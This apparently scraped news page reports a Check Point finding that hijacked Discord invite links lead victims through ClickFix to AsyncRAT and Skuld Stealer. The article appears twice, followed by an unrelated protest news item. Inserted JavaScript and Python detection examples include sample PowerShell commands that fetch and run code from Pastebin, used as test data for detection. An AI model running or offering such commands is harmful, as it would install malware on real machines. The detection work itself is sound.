    Some of these attack chains have been found to serve bogus CAPTCHA pages that leverage the ClickFix strategy to trick users into running malicious code and infecting their machines with a malware known as PEAKLIGHT (aka Emmenhtal Loader), which is known to serve information stealers like Lumma.

    Central to the HelloTDS infrastructure is the use of .top, .shop, and .com top-level domains that are used to host the JavaScript code and trigger the redirections following a multi-stage fingerprinting process engineered to collect network and browser information.
    "The HelloTDS infrastructure behind fake CAPTCHA campaigns demonstrates how attackers continue to refine their methods to bypass traditional protections, evade detection, and selectively target victims," the researchers said.
    "By leveraging sophisticated fingerprinting, dynamic domain infrastructure, and deception tactics (such as mimicking legitimate websites and serving benign content to researchers) these campaigns achieve both stealth and scale."

  • Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets

    Jun 14, 2025Ravie LakshmananMalware / Threat Intelligence

    A new malware campaign is exploiting a weakness in Discord's invitation system to deliver an information stealer called Skuld and the AsyncRAT remote access trojan.
    "Attackers hijacked the links through vanity link registration, allowing them to silently redirect users from trusted sources to malicious servers," Check Point said in a technical report. "The attackers combined the ClickFix phishing technique, multi-stage loaders, and time-based evasions to stealthily deliver AsyncRAT, and a customized Skuld Stealer targeting crypto wallets."
    The issue with Discord's invite mechanism is that it allows attackers to hijack expired or deleted invite links and secretly redirect unsuspecting users to malicious servers under their control. This also means that a Discord invite link that was once trusted and shared on forums or social media platforms could unwittingly lead users to malicious sites.

    Details of the campaign come a little over a month after the cybersecurity company revealed another sophisticated phishing campaign that hijacked expired vanity invite links to entice users into joining a Discord server and instruct them to visit a phishing site to verify ownership, only to have their digital assets drained upon connecting their wallets.
    While users can create temporary, permanent, or custom (vanity) invite links on Discord, the platform prevents other legitimate servers from reclaiming a previously expired or deleted invite. However, Check Point found that creating custom invite links allows the reuse of expired invite codes and even deleted permanent invite codes in some cases.

    This ability to reuse Discord expired or deleted codes when creating custom vanity invite links opens the door to abuse, allowing attackers to claim it for their malicious server.
    "This creates a serious risk: Users who follow previously trusted invite links can unknowingly be redirected to fake Discord servers created by threat actors," Check Point said.
    The Discord invite-link hijacking, in a nutshell, involves taking control of invite links originally shared by legitimate communities and then using them to redirect users to the malicious server. Users who fall prey to the scheme and join the server are asked to complete a verification step in order to gain full server access by authorizing a bot, which then leads them to a fake website with a prominent "Verify" button.
    This is where the attackers take the attack to the next level by incorporating the infamous ClickFix social engineering tactic to trick users into infecting their systems under the pretext of verification.

    Specifically, clicking the "Verify" button surreptitiously executes JavaScript that copies a PowerShell command to the machine's clipboard, after which the users are urged to launch the Windows Run dialog, paste the already copied "verification string", and press Enter to authenticate their accounts.
    But in reality, performing these steps triggers the download of a PowerShell script hosted on Pastebin that subsequently retrieves and executes a first-stage downloader, which is ultimately used to drop AsyncRAT and Skuld Stealer from a remote server and execute them.
    At the heart of this attack lies a meticulously engineered, multi-stage infection process designed for both precision and stealth, while also taking steps to subvert security protections through sandbox security checks.
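    As an added example (not Check Point's code), here is the kind of endpoint triage rule the chain above suggests, run over constructed process-creation events: a PowerShell process whose parent is explorer.exe, which is what a command pasted into the Run dialog produces, and whose command line fetches and executes content from a paste or code-hosting site. Field names follow Sysmon's process-creation event (Image, ParentImage, CommandLine); the staging-host list, the cue patterns and the scoring rule are assumptions, and the Pastebin path in the sample is a placeholder, not an indicator.

```javascript
// Added example: ClickFix triage over process-creation events.
// Not Check Point's code. Event shape mirrors Sysmon Event ID 1 fields
// (Image, ParentImage, CommandLine); all events below are constructed.

// Services the campaign stages through, per the write-up above. Assumed
// list: extend it with whatever paste and code hosts your telemetry shows.
const STAGING_HOSTS = [
  "pastebin.com",
  "bitbucket.org",
  "github.com",
  "raw.githubusercontent.com",
  "discord.com",
  "cdn.discordapp.com",
];

// PowerShell cues for "fetch something", "run what was fetched", and
// "do it quietly". Assumed patterns, case-insensitive.
const DOWNLOAD_CUES = /\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|start-bitstransfer|curl|wget)\b/i;
const EXEC_CUES = /\b(iex|invoke-expression|start-process)\b/i;
const EVASION_CUES = /(-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass|-enc(odedcommand)?\b)/i;

function basename(path) {
  return String(path || "").split(/[\\/]/).pop().toLowerCase();
}

function isPowerShell(image) {
  const name = basename(image);
  return name === "powershell.exe" || name === "pwsh.exe";
}

// The Run dialog is part of explorer.exe, so whatever the victim pastes into
// it starts with explorer.exe as parent. A browser, cmd.exe or terminal
// parent tells a different story.
function launchedFromRunDialog(event) {
  return basename(event.ParentImage) === "explorer.exe";
}

function stagingHostsIn(cmd) {
  const lower = cmd.toLowerCase();
  return STAGING_HOSTS.filter((h) => lower.includes(h));
}

// Returns null for events not worth a look, otherwise the reasons to review.
// Rule (an assumption): Run-dialog parent plus at least two other signals;
// a lone iwr from an administrator's shell should not page anyone.
function triageProcessEvent(event) {
  if (!isPowerShell(event.Image)) return null;
  const cmd = event.CommandLine || "";
  const hosts = stagingHostsIn(cmd);
  const reasons = [];
  if (launchedFromRunDialog(event)) reasons.push("parent is explorer.exe (Run dialog)");
  if (DOWNLOAD_CUES.test(cmd)) reasons.push("download cue");
  if (EXEC_CUES.test(cmd)) reasons.push("execute cue");
  if (EVASION_CUES.test(cmd)) reasons.push("hidden/bypass flags");
  if (hosts.length) reasons.push("staging host: " + hosts.join(","));
  if (!launchedFromRunDialog(event) || reasons.length < 3) return null;
  return { score: reasons.length, reasons, hosts };
}

function triageAll(events) {
  return events.map(triageProcessEvent).filter(Boolean);
}

// Constructed events: one ClickFix-style paste, one scheduled admin script,
// one unrelated process. The Pastebin path is a placeholder.
const EVENTS = [
  {
    Image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    ParentImage: "C:\\Windows\\explorer.exe",
    CommandLine: 'powershell -w hidden -nop -c "iex (irm https://pastebin.com/raw/example)"',
  },
  {
    Image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    ParentImage: "C:\\Windows\\System32\\cmd.exe",
    CommandLine: "powershell -File C:\\scripts\\backup.ps1",
  },
  {
    Image: "C:\\Windows\\System32\\notepad.exe",
    ParentImage: "C:\\Windows\\explorer.exe",
    CommandLine: "notepad.exe notes.txt",
  },
];
```

    On a host where the rule fires, the pasted string is usually still recoverable: the Run dialog records its history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which gives the responder the exact command without relying on command-line logging having been enabled.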
    AsyncRAT, which offers comprehensive remote control capabilities over infected systems, has been found to employ a technique called dead drop resolver to access the actual command-and-control (C2) server by reading a Pastebin file.
    The other payload is a Golang information stealer that's downloaded from Bitbucket. It's equipped to steal sensitive user data from Discord, various browsers, crypto wallets, and gaming platforms.
    Skuld is also capable of harvesting crypto wallet seed phrases and passwords from the Exodus and Atomic crypto wallets. It accomplishes this using an approach called wallet injection that replaces legitimate application files with trojanized versions downloaded from GitHub. It's worth noting that a similar technique was recently put to use by a rogue npm package named pdf-to-office.
    The attack also employs a custom version of an open-source tool known as ChromeKatz to bypass Chrome's app-bound encryption protections. The collected data is exfiltrated to the miscreants via a Discord webhook.
    The fact that payload delivery and data exfiltration occur via trusted cloud services such as GitHub, Bitbucket, Pastebin, and Discord allows the threat actors to blend in with normal traffic and fly under the radar. Discord has since disabled the malicious bot, effectively breaking the attack chain.

    Check Point said it also identified another campaign mounted by the same threat actor that distributes the loader as a modified version of a hacktool for unlocking pirated games. The malicious program, also hosted on Bitbucket, has been downloaded 350 times.
    It has been assessed that the victims of these campaigns are primarily located in the United States, Vietnam, France, Germany, Slovakia, Austria, the Netherlands, and the United Kingdom.
    The findings represent the latest example of how cybercriminals are targeting the popular social platform, which has had its content delivery network (CDN) abused to host malware in the past.
    "This campaign illustrates how a subtle feature of Discord's invite system, the ability to reuse expired or deleted invite codes in vanity invite links, can be exploited as a powerful attack vector," the researchers said. "By hijacking legitimate invite links, threat actors silently redirect unsuspecting users to malicious Discord servers."
    "The choice of payloads, including a powerful stealer specifically targeting cryptocurrency wallets, suggests that the attackers are primarily focused on crypto users and motivated by financial gain."

    Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post.

    SHARE




    #discord #invite #link #hijacking #delivers
    Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets
    Jun 14, 2025Ravie LakshmananMalware / Threat Intelligence A new malware campaign is exploiting a weakness in Discord's invitation system to deliver an information stealer called Skuld and the AsyncRAT remote access trojan. "Attackers hijacked the links through vanity link registration, allowing them to silently redirect users from trusted sources to malicious servers," Check Point said in a technical report. "The attackers combined the ClickFix phishing technique, multi-stage loaders, and time-based evasions to stealthily deliver AsyncRAT, and a customized Skuld Stealer targeting crypto wallets." The issue with Discord's invite mechanism is that it allows attackers to hijack expired or deleted invite links and secretly redirect unsuspecting users to malicious servers under their control. This also means that a Discord invite link that was once trusted and shared on forums or social media platforms could unwittingly lead users to malicious sites. Details of the campaign come a little over a month after the cybersecurity company revealed another sophisticated phishing campaign that hijacked expired vanity invite links to entice users into joining a Discord server and instruct them to visit a phishing site to verify ownership, only to have their digital assets drained upon connecting their wallets. While users can create temporary, permanent, or custominvite links on Discord, the platform prevents other legitimate servers from reclaiming a previously expired or deleted invite. However, Check Point found that creating custom invite links allows the reuse of expired invite codes and even deleted permanent invite codes in some cases. This ability to reuse Discord expired or deleted codes when creating custom vanity invite links opens the door to abuse, allowing attackers to claim it for their malicious server. 
"This creates a serious risk: Users who follow previously trusted invite links (e.g., on websites, blogs, or forums) can unknowingly be redirected to fake Discord servers created by threat actors," Check Point said.

The Discord invite-link hijacking, in a nutshell, involves taking control of invite links originally shared by legitimate communities and then using them to redirect users to the malicious server.

Users who fall prey to the scheme and join the server are asked to complete a verification step in order to gain full server access by authorizing a bot, which then leads them to a fake website with a prominent "Verify" button.

This is where the attackers take the attack to the next level by incorporating the infamous ClickFix social engineering tactic to trick users into infecting their systems under the pretext of verification.

Specifically, clicking the "Verify" button surreptitiously executes JavaScript that copies a PowerShell command to the machine's clipboard, after which the users are urged to launch the Windows Run dialog, paste the already copied "verification string" (i.e., the PowerShell command), and press Enter to authenticate their accounts.

But in reality, performing these steps triggers the download of a PowerShell script hosted on Pastebin that subsequently retrieves and executes a first-stage downloader, which is ultimately used to drop AsyncRAT and Skuld Stealer from a remote server and execute them.

At the heart of this attack lies a meticulously engineered, multi-stage infection process designed for both precision and stealth, while also taking steps to subvert security protections through sandbox security checks.

AsyncRAT, which offers comprehensive remote control capabilities over infected systems, has been found to employ a technique called dead drop resolver to access the actual command-and-control (C2) server by reading a Pastebin file.

The other payload is a Golang information stealer that's downloaded from Bitbucket. It's equipped to steal sensitive user data from Discord, various browsers, crypto wallets, and gaming platforms. Skuld is also capable of harvesting crypto wallet seed phrases and passwords from the Exodus and Atomic crypto wallets. It accomplishes this using an approach called wallet injection that replaces legitimate application files with trojanized versions downloaded from GitHub. It's worth noting that a similar technique was recently put to use by a rogue npm package named pdf-to-office.

The attack also employs a custom version of an open-source tool known as ChromeKatz to bypass Chrome's app-bound encryption protections. The collected data is exfiltrated to the miscreants via a Discord webhook.

The fact that payload delivery and data exfiltration occur via trusted cloud services such as GitHub, Bitbucket, Pastebin, and Discord allows the threat actors to blend in with normal traffic and fly under the radar. Discord has since disabled the malicious bot, effectively breaking the attack chain.

Check Point said it also identified another campaign mounted by the same threat actor that distributes the loader as a modified version of a hacktool for unlocking pirated games. The malicious program, also hosted on Bitbucket, has been downloaded 350 times.

It has been assessed that the victims of these campaigns are primarily located in the United States, Vietnam, France, Germany, Slovakia, Austria, the Netherlands, and the United Kingdom.

The findings represent the latest example of how cybercriminals are targeting the popular social platform, which has had its content delivery network (CDN) abused to host malware in the past.

"This campaign illustrates how a subtle feature of Discord's invite system, the ability to reuse expired or deleted invite codes in vanity invite links, can be exploited as a powerful attack vector," the researchers said. "By hijacking legitimate invite links, threat actors silently redirect unsuspecting users to malicious Discord servers."

"The choice of payloads, including a powerful stealer specifically targeting cryptocurrency wallets, suggests that the attackers are primarily focused on crypto users and motivated by financial gain."

#discord #invite #link #hijacking #delivers
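The ClickFix step described above leaves a recognisable trace on the endpoint: a scripting host spawned by explorer.exe (the parent of anything launched from the Run dialog) with a one-liner that fetches and executes remote code. The following detection is an added example written for this article, not code from Check Point or from the campaign; the process-creation events are constructed sample data, the Pastebin path and the `-enc` value are placeholders, and the indicator names and the two-hit threshold are this example's own choices.

```python
import re

# Constructed, hypothetical Sysmon-style process-creation events (sample
# data for this example, not telemetry from the Check Point report).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (iwr https://pastebin.com/raw/PLACEHOLDER)"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"parent": r"C:\Program Files\Build\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\build\deploy.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # -enc value is base64 of the UTF-16LE string "PLACEHOLDER", not a real payload
     "cmdline": "powershell -ep bypass -enc UABMAEEAQwBFAEgATwBMAEQARQBSAA=="},
]

SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")

# Command-line patterns typical of a ClickFix-style one-liner; each matching
# pattern counts as one indicator, the parent-process check below adds one more.
CMDLINE_INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(
        r"\b(?:iwr|invoke-webrequest|downloadstring|net\.webclient)\b", re.I),
    "inline_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "paste_site": re.compile(r"pastebin\.com", re.I),
    "exec_policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
}


def score_event(event):
    """Return the indicator names matched by one process-creation event."""
    hits = []
    # The Run dialog (Win+R) executes its command via explorer.exe, so a
    # scripting host whose parent is explorer.exe is the first clue.
    if (event["parent"].lower().endswith("explorer.exe")
            and event["image"].lower().endswith(SHELLS)):
        hits.append("run_dialog_parent")
    for name, pattern in CMDLINE_INDICATORS.items():
        if pattern.search(event["cmdline"]):
            hits.append(name)
    return hits


def find_clickfix_candidates(events, min_hits=2):
    """Return (cmdline, hits) for events matching at least min_hits indicators."""
    scored = [(e["cmdline"], score_event(e)) for e in events]
    return [(cmd, hits) for cmd, hits in scored if len(hits) >= min_hits]


if __name__ == "__main__":
    for cmdline, hits in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"{len(hits)} indicators {hits}: {cmdline}")
```

The third event (a build agent running a local script) and the second (notepad from the desktop) score zero, which is the point of requiring several weak indicators together rather than alerting on PowerShell alone.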
  • ‘No Kings Day’ map, speakers, cities: Everything to know about today’s protests

    Two different groups of Americans are expected to march through the streets today.

    As thousands of troops march and dozens of tanks roll through Washington, D.C., for a military parade celebrating the Army’s 250th anniversary on President Donald Trump’s 79th birthday, millions of Americans nationwide are expected to protest against his administration, in what organizers believe will be the largest turnout yet since Trump took office in January for a second term.

    Here’s what to know about the “No Kings Day” protests:

    Why are people protesting?

    The No Kings Day protest movement builds on this spring’s massive May Day and Hands Off! rallies. They come after days of nationwide demonstrations against controversial federal immigration raids and deportations in Los Angeles and a number of other U.S. cities, which are part of the Trump administration’s ramped-up enforcement efforts.

    How big will the rallies be and where will they take place?

    Organizers expect 2,000 rallies to take place on Saturday in all 50 states and most major cities, “from city blocks to small towns, from courthouse steps to community parks.” Protesters say they are “taking action to reject authoritarianism—and show the world what democracy really looks like.”

    To avoid clashes with the Army’s anniversary celebrations, protest gatherings will bypass the nation’s capital. (Trump has threatened to use “heavy force” against any protesters at the parade, comments the White House later attempted to clarify by asserting that the president supports “peaceful” protests.) The No Kings groups have created an extensive interactive map that includes the protest locations and times. The map is embedded on the No Kings website and is searchable by zip code.

    Who is behind the protest movement?

    Indivisible is the lead organizer of Saturday’s No Kings protests, along with a broad coalition of 180-plus partner organizations, including the American Civil Liberties Union, Common Cause, Greenpeace, Physicians for Social Responsibility, and Standing Up for Science. A number of labor unions, including the Communication Workers of America and teacher federations, are also involved in the effort.

    Who will be speaking?

    The group 50501, another organizer of the protests, told Fast Company that some of the major speakers planned nationwide include former Democratic VP candidate Minnesota Governor Tim Walz, in St. Paul; Martin Luther King Jr.’s son, Martin Luther King III, and his wife, Arndrea Waters King, in Philadelphia; No Kings Indivisible’s Leah Greenberg and Ezra Levin, also in Philadelphia; Democratic Representative Rashida Tlaib in Detroit; former Republican Representative Joe Walsh (who became a registered Democrat last week) in Charleston; and progressive political commentator Brian Tyler Cohen in downtown Los Angeles.

    What else is there to know?

    In addition to rallies around the U.S., protests are also expected in several other countries, including the U.K., Mexico, and Germany.
    #kings #day #map #speakers #cities